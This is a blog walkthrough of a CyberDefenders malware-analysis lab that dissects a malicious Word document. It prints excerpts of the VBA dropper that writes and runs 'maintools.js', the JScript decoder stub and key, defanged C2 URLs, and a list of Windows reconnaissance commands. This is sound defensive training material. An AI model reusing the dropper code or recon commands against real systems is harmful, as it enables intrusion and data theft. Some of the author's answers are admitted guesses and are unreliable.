CyberDefenders - Obfuscated
Post

CyberDefenders - Obfuscated

Obfuscated

Back again for another CyberDefenders post. This is Obfuscated and I’ll work this like the last one, poke around before I answer any questions. The prompt again is pretty simple, you got a document, gotta tell them what it is.

1
During your shift as a SOC analyst, the enterprise EDR alerted a suspicious behavior from an end-user machine. The user indicated that he received a recent email with a DOC file from an unknown sender and passed the document for you to analyze.

I downloaded the document, moved it to my linux environment, unzipped it with the password, and began.

Looking around

First things first, get the sha256 of the file and run file on it to see what we got.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
└─(23:32:09)──> ls                                                                                                                                                   ──(Mon,Oct04)─┘
49b367ac261a722a7c2bbbc328c32545  c58-js-backdoor.zip
┌─(~/scratch)────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────(computer@computer:pts/3)─┐
└─(23:32:09)──> sha256sum                                                                                                                                            ──(Mon,Oct04)─┘
┌─(~/scratch)────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────(computer@computer:pts/3)─┐
└─(23:34:13)──> ls -asl                                                                                                                                        130 ↵ ──(Mon,Oct04)─┘
total 368
  4 drwxr-xr-x  2 computer computer   4096 Oct  4 23:31 .
  4 drwxr-xr-x 22 computer computer   4096 Oct  4 23:34 ..
196 -rw-r--r--  1 computer computer 199680 Sep 16 21:02 49b367ac261a722a7c2bbbc328c32545
164 -rwxrwxrwx  1 computer computer 164336 Oct  4 23:30 c58-js-backdoor.zip
┌─(~/scratch)────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────(computer@computer:pts/3)─┐
└─(23:34:15)──> sha256sum 49b367ac261a722a7c2bbbc328c32545                                                                                                           ──(Mon,Oct04)─┘
ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751  49b367ac261a722a7c2bbbc328c32545
┌─(~/scratch)────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────(computer@computer:pts/3)─┐
└─(23:34:19)──> file 49b367ac261a722a7c2bbbc328c32545                                                                                                                ──(Mon,Oct04)─┘
49b367ac261a722a7c2bbbc328c32545: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: user, Template: Normal.dotm, Last Saved By: John, Revision Number: 11, Name of Creating Application: Microsoft Office Word, Total Editing Time: 08:00, Create Time/Date: Fri Nov 25 19:04:00 2016, Last Saved Time/Date: Fri Nov 25 20:04:00 2016, Number of Pages: 1, Number of Words: 320, Number of Characters: 1828, Security: 0

As expected, an office document.

We’re going to use oletools again because they’re the best. I created a virtual environment with pipenv and then installed the tools with pipenv install oletools. First we use oledir to see the structure of the document.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
(scratch) ┌─(~/scratch)────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────(computer@computer:pts/4)─┐
└─(23:36:12)──> oledir 49b367ac261a722a7c2bbbc328c32545                                                                                                              ──(Mon,Oct04)─┘
oledir 0.54 - http://decalage.info/python/oletools
OLE directory entries in file 49b367ac261a722a7c2bbbc328c32545:
----+------+-------+----------------------+-----+-----+-----+--------+------
id  |Status|Type   |Name                  |Left |Right|Child|1st Sect|Size  
----+------+-------+----------------------+-----+-----+-----+--------+------
0   |<Used>|Root   |Root Entry            |-    |-    |10   |11E     |13312 
1   |<Used>|Stream |Data                  |-    |-    |-    |106     |4096  
2   |<Used>|Stream |WordDocument          |9    |-    |-    |0       |133755
3   |<Used>|Storage|ObjectPool            |-    |-    |4    |0       |0     
4   |<Used>|Storage|_1541577328           |-    |-    |6    |0       |0     
5   |<Used>|Stream |\x03EPRINT            |-    |-    |-    |113     |5000  
6   |<Used>|Stream |\x01CompObj           |5    |7    |-    |0       |76    
7   |<Used>|Stream |\x03ObjInfo           |-    |8    |-    |2       |6     
8   |<Used>|Stream |\x01Ole10Native       |-    |-    |-    |120     |20301 
9   |<Used>|Stream |1Table                |1    |24   |-    |174     |8017  
10  |<Used>|Stream |\x05SummaryInformation|2    |11   |-    |3       |392   
11  |<Used>|Stream |\x05DocumentSummaryInf|-    |-    |-    |A       |284   
    |      |       |ormation              |     |     |     |        |      
12  |<Used>|Storage|Macros                |-    |-    |22   |0       |0     
13  |<Used>|Storage|VBA                   |-    |-    |17   |0       |0     
14  |<Used>|Stream |dir                   |-    |-    |-    |F       |565   
15  |<Used>|Stream |Module1               |14   |16   |-    |14B     |7117  
16  |<Used>|Stream |__SRP_0               |-    |-    |-    |18      |2964  
17  |<Used>|Stream |__SRP_1               |15   |19   |-    |47      |195   
18  |<Used>|Stream |__SRP_2               |-    |-    |-    |4B      |2717  
19  |<Used>|Stream |__SRP_3               |18   |20   |-    |76      |290   
20  |<Used>|Stream |ThisDocument          |-    |21   |-    |7B      |1104  
21  |<Used>|Stream |_VBA_PROJECT          |-    |-    |-    |8D      |3467  
22  |<Used>|Stream |PROJECT               |13   |23   |-    |C4      |483   
23  |<Used>|Stream |PROJECTwm             |-    |-    |-    |CC      |65    
24  |<Used>|Stream |\x01CompObj           |12   |3    |-    |CE      |114   
25  |unused|Empty  |                      |-    |-    |-    |0       |0     
26  |unused|Empty  |                      |-    |-    |-    |0       |0     
27  |unused|Empty  |                      |-    |-    |-    |0       |0     
----+----------------------------+------+--------------------------------------
id  |Name                        |Size  |CLSID                                 
----+----------------------------+------+--------------------------------------
0   |Root Entry                  |-     |00020906-0000-0000-C000-000000000046  
    |                            |      |Microsoft Word 97-2003 Document       
    |                            |      |(Word.Document.8)                     
24  |\x01CompObj                 |114   |                                      
11  |\x05DocumentSummaryInformati|284   |                                      
    |on                          |      |                                      
10  |\x05SummaryInformation      |392   |                                      
9   |1Table                      |8017  |                                      
1   |Data                        |4096  |                                      
12  |Macros                      |-     |                                      
22  |  PROJECT                   |483   |                                      
23  |  PROJECTwm                 |65    |                                      
13  |  VBA                       |-     |                                      
15  |    Module1                 |7117  |                                      
20  |    ThisDocument            |1104  |                                      
21  |    _VBA_PROJECT            |3467  |                                      
16  |    __SRP_0                 |2964  |                                      
17  |    __SRP_1                 |195   |                                      
18  |    __SRP_2                 |2717  |                                      
19  |    __SRP_3                 |290   |                                      
14  |    dir                     |565   |                                      
3   |ObjectPool                  |-     |                                      
4   |  _1541577328               |-     |0003000C-0000-0000-C000-000000000046  
    |                            |      |OLE Package Object (may contain and   
    |                            |      |run any file)                         
6   |    \x01CompObj             |76    |                                      
8   |    \x01Ole10Native         |20301 |                                      
5   |    \x03EPRINT              |5000  |                                      
7   |    \x03ObjInfo             |6     |                                      
2   |WordDocument                |133755|                                      
(scratch) ┌─(~/scratch)────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────(computer@computer:pts/4)─┐
└─(23:36:43)──>                                                                                                                                                      ──(Mon,Oct04)─┘

Then we’ll do an olevba and see the summary of what we’ve got.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
(scratch) ┌─(~/scratch)────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────(computer@computer:pts/4)─┐
└─(23:37:12)──> olevba 49b367ac261a722a7c2bbbc328c32545                                                                                                              ──(Mon,Oct04)─┘
olevba 0.56.1 on Python 3.8.5 - http://decalage.info/python/oletools
===============================================================================
FILE: 49b367ac261a722a7c2bbbc328c32545
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls 
in file: 49b367ac261a722a7c2bbbc328c32545 - OLE stream: 'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
<SNIP> 
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |AutoOpen            |Runs when the Word document is opened        |
|AutoExec  |AutoClose           |Runs when the Word document is closed        |
|Suspicious|Environ             |May read system environment variables        |
|Suspicious|Open                |May open a file                              |
|Suspicious|Put                 |May write to a file (if combined with Open)  |
|Suspicious|Binary              |May read or write a binary file (if combined |
|          |                    |with Open)                                   |
|Suspicious|Kill                |May delete a file                            |
|Suspicious|Shell               |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|WScript.Shell       |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|Run                 |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|CreateObject        |May create an OLE object                     |
|Suspicious|Windows             |May enumerate application windows (if        |
|          |                    |combined with Shell.Application object)      |
|Suspicious|Xor                 |May attempt to obfuscate specific strings    |
|          |                    |(use option --deobf to deobfuscate)          |
|Suspicious|Base64 Strings      |Base64-encoded strings were detected, may be |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|IOC       |maintools.js        |Executable file name                         |
+----------+--------------------+---------------------------------------------+

You can use oledump to extract specific ole objects. Let’s see a summary:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
(scratch) ┌─(~/scratch)───────────────────────────────────────────────────────────────────────────────(computer@computer:pts/4)─┐
└─(00:15:24)──> python3 oledump.py 49b367ac261a722a7c2bbbc328c32545                               127 ↵ ──(Wed,Oct20)─┘
  1:       114 '\x01CompObj'
  2:       284 '\x05DocumentSummaryInformation'
  3:       392 '\x05SummaryInformation'
  4:      8017 '1Table'
  5:      4096 'Data'
  6:       483 'Macros/PROJECT'
  7:        65 'Macros/PROJECTwm'
  8: M    7117 'Macros/VBA/Module1'
  9: m    1104 'Macros/VBA/ThisDocument'
 10:      3467 'Macros/VBA/_VBA_PROJECT'
 11:      2964 'Macros/VBA/__SRP_0'
 12:       195 'Macros/VBA/__SRP_1'
 13:      2717 'Macros/VBA/__SRP_2'
 14:       290 'Macros/VBA/__SRP_3'
 15:       565 'Macros/VBA/dir'
 16:        76 'ObjectPool/_1541577328/\x01CompObj'
 17: O   20301 'ObjectPool/_1541577328/\x01Ole10Native'
 18:      5000 'ObjectPool/_1541577328/\x03EPRINT'
 19:         6 'ObjectPool/_1541577328/\x03ObjInfo'
 20:    133755 'WordDocument'

The interesting objects with macros appear to be 8 and 9. Let’s look at 8 first (truncated some).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
(scratch) ┌─(~/scratch)───────────────────────────────────────────────────────────────────────────────(computer@computer:pts/4)─┐
└─(00:15:29)──> python3 oledump.py 49b367ac261a722a7c2bbbc328c32545 -s 8 -v                         2 ↵ ──(Wed,Oct20)─┘
Attribute VB_Name = "Module1"
Public OBKHLrC3vEDjVL As String
Public B8qen2T433Ds1bW As String
<SNIP..... >
On Error Resume Next
Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
R7Ks7ug4hRR2weOy7.DeleteFile B8qen2T433Ds1bW & "\*.*", True
Set R7Ks7ug4hRR2weOy7 = Nothing
End Sub
<SNIP..... >
End If
B8qen2T433Ds1bW = Environ("appdata") & "\Microsoft\Windows"
Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
If Not R7Ks7ug4hRR2weOy7.FolderExists(B8qen2T433Ds1bW) Then
B8qen2T433Ds1bW = Environ("appdata")
End If
Set R7Ks7ug4hRR2weOy7 = Nothing
Dim K764B5Ph46Vh
K764B5Ph46Vh = FreeFile
OBKHLrC3vEDjVL = B8qen2T433Ds1bW & "\" & "maintools.js"
Open (OBKHLrC3vEDjVL) For Binary As #K764B5Ph46Vh
Put #K764B5Ph46Vh, 1, Wk4o3X7x1134j
Close #K764B5Ph46Vh
Erase Wk4o3X7x1134j
Set R66BpJMgxXBo2h = CreateObject("WScript.Shell")
R66BpJMgxXBo2h.Run """" + OBKHLrC3vEDjVL + """" + " EzZETcSXyKAdF_e5I2i1"
<SNIP..... >

At this point, we can reasonable assume a file called maintools.js is going to get extracted and dropped to disk and executed via wscript.shell.

There is a tool called ViperMonkey that will let you execute macros without actually running them, but I was struggling to get it working in python3 and didn’t want to go through the the whole exercise of getting it working. You also have the option of running it in a local sandbox, but I don’t have a copy of MS Office around and don’t typically keep windows VMs around for malware analysis.

Fortunately, this isn’t sensitive, we can use cloud sandboxes, and any.run is a great one with a ton of features. We can use it to skip some tricky parts and get ahead.

You can find analysis of the file here, I didn’t even have to upload it, someone already did. We are going to just go by the honor system here and use it for the parts we need it and do the rest manually. Let’s find the maintools.js file and see what we can get from it. You can find the file under the files tab and then click the file and view the content under the preview tab.

I’m going to do this in a docker container to avoid the hassle of a VM and get some quick answers. This is not as secure as using an isolated virtual machine, but I’m already doing docker within a Linux VM on a host so I think it’d be tricky enough for something to get out for me to do this. I write the contents of the file using VIM to a text file and use docker cp to copy the file to the container

1
2
3
4
5
6
7
8
9
10
┌─(~)───────────────────────────────────────────────────────────────────────────────────────(computer@computer:pts/3)─┐
└─(21:23:51)──> docker cp wow 1df:/tmp/wow                                                              ──(Wed,Oct20)─┘
┌─(~)───────────────────────────────────────────────────────────────────────────────────────(computer@computer:pts/3)─┐
└─(21:23:57)──> vi wow                                                                                  ──(Wed,Oct20)─┘
┌─(~)───────────────────────────────────────────────────────────────────────────────────────(computer@computer:pts/3)─┐
└─(21:24:09)──> docker cp wow 1df:/tmp/wow                                                              ──(Wed,Oct20)─┘
┌─(~)───────────────────────────────────────────────────────────────────────────────────────(computer@computer:pts/3)─┐
└─(21:24:11)──> docker exec -it 1df bash                                                                ──(Wed,Oct20)─┘
root@1dfad72daf6e:/# ls /tmp
wow

I’ll also need to install vim and nodejs in the container and then edit the file. I look for statements that look like they could run code, eval, and stuff like that and change them to console.log. This is dirty, but can work. I defang bits as I find them and console.log where I can.

The defanged and (I think) safe to run function ends up lookign like this when I’m done.

1
2
3
4
5
root@1dfad72daf6e:/# head /tmp/wow
try{var wvy1 = 'EzZETcSXyKAdF_e5I2i1';var ssWZ = wvy1;var ES3c = y3zb();ES3c = LXv5(ES3c);ES3c = CpPT(ssWZ,ES3c);console.log(ES3c);
}catch (e)
{console.log(e);}function MTvK(CgqD){var XwH7 = CgqD.charCodeAt(0);if (XwH7 === 0x2B || XwH7 === 0x2D) return 62
<SNIP...>

You can take the ouput and send it to cyberchef to see what it looks like prettified. The URL is huge but this is it so I hope it works

Right away we can see a ton of suspicious stuff. Like this block of URLs, defanged

1
2
var CKpR = new Array('hxxp://www.saipadiesel124[.]com/wp-content/plugins/imsanity/tmp[.]php', 'hxxp://www.folk-cantabria[.]com/wp-content/plugins/wp-statistics/includes/classes/gallery_create_page_field[.]php');

You also see this block of commands to enumerate system information

1
var auME = new Array('systeminfo > ', 'net view >> ', 'net view /domain >> ', 'tasklist /v >> ', 'gpresult /z >> ', 'netstat -nao >> ', 'ipconfig /all >> ', 'arp -a >> ', 'net share >> ', 'net use >> ', 'net user >> ', 'net user administrator >> ', 'net user /domain >> ', 'net user administrator /domain >> ', 'set  >> ', 'dir %systemdrive%\\Users\\*.* >> ', 'dir %userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*.* >> ', 'dir %userprofile%\\Desktop\\*.* >> ', 'tasklist /fi "modules eq wow64.dll"  >> ', 'tasklist /fi "modules ne wow64.dll" >> ', 'dir "%programfiles(x86)%" >> ', 'dir "%programfiles%" >> ', 'dir %appdata% >>');

It creates some script ojbects runs them, there’s some C2 stuff, a username generator, and attempts to create persistent tasks.

I don’t think I’m gonna get a great idea of what exactly it does without executing it, so I’m gonna start seeing what questions I can answer.

Questions

What is the sha256 hash of the doc file?

Pretty easy, we got this earlier by running sha256sum on the file.

ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751

Multiple streams contain macros in this document. Provide the number of lowest one.

See above again, stream 8 is the answer

What is the decryption key of the obfuscated code?

This is the string we inserted as a static variable in the JS script, EzZETcSXyKAdF_e5I2i1

What is the name of the dropped file?

This is our buddy maintools.js

This script uses what language?

Good ol javascript, but the answer they want is JScript

What is the name of the variable that is assigned the command-line arguments?

The command line argument was the decryption key, that was assigned to wvy1

How many command-line arguments does this script expect?

It expects 1

What instruction is executed if this script encounters an error?

We had to remove this since nodejs doesn’t know what it is WScript.Quit()

What function returns the next stage of code (i.e. the first round of obfuscated code)?

This is y3zb, look at that first line of the script, y3zb is the first one called

1
try{var wvy1 = WScript.Arguments;var ssWZ = wvy1(0);var ES3c = y3zb();ES3c = LXv5(ES3c);ES3c = CpPT(ssWZ,ES3c);eval(ES3c);  

The function LXv5 is an important function, what variable is assigned a key string value in determining what this function does?

This function is assigned the alphabet so it can construct strings

1
}function LXv5(d27x){var LUK7 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";var i;var j;var n6T8;if (d27x.length % 4 > 0)

What encoding scheme is this function responsible for decoding?

The big block of text is base64 encoded, you seen it enough you just know, but the = at the end is another giveaway

In the function CpPT, the first two for loops are responsible for what important part of this function?

I didn’t get this one, even with the hints. I tried AES, because I saw the IV value set, but wasn’t sure, encryption isn’t my strong suit. I also tried RC4, CBC, XOR, and no dice. Either I am way off or its not being input in the format the want???

The function CpPT requires two arguments, where does the value of the first argument come from?

This variable came from the command-line argument

For the function CpPT, what does the first argument represent?

They first arg is the key

What encryption algorithm does the function CpPT implement in this script?

Gonna guess RC4 here

What function is responsible for executing the deobfuscated code?

eval was the big one we defanged, that’s the one

What Windows Script Host program can be used to execute this script in command-line mode?

That’ll be CScript.exe

What is the name of the first function defined in the deobfuscated code?

We can look at the deobfuscated code and see function UspD(zDmy) was defined first

All Done

Ok that’s all done. What a good one, I was able to pull some IOCs and answer almost all the questions. Once I was done, I took a look at the write up in the video and saw the wrong answer I had, I was way off lol. This took me a few different nights over several weeks, maybe an hour or two here and there for a total of about 4 hours of effort.

It was vindicating to see that the processes I use (which are admittedly somewhat janky) still work. In a real situation, I would have probably leaned heavier on a sandbox I hope whoever I work for at the time would be paying for or go through manual steps like this. Another option, especially if I don’t care about the details and just wanna pull IOCs out, is to run it in a malware detonation VM with something like Sysmon or an EDR running to see what it catches.

Typically with something like this, I want Hashes, URLs, file names, process names, command line arguments, and other similar IOCs so I can scope the breadth of the infection in an environment. At home, on cyberdefenders.org, I just wanna see how many points I get.

Thanks for reading, hope you got something out of this.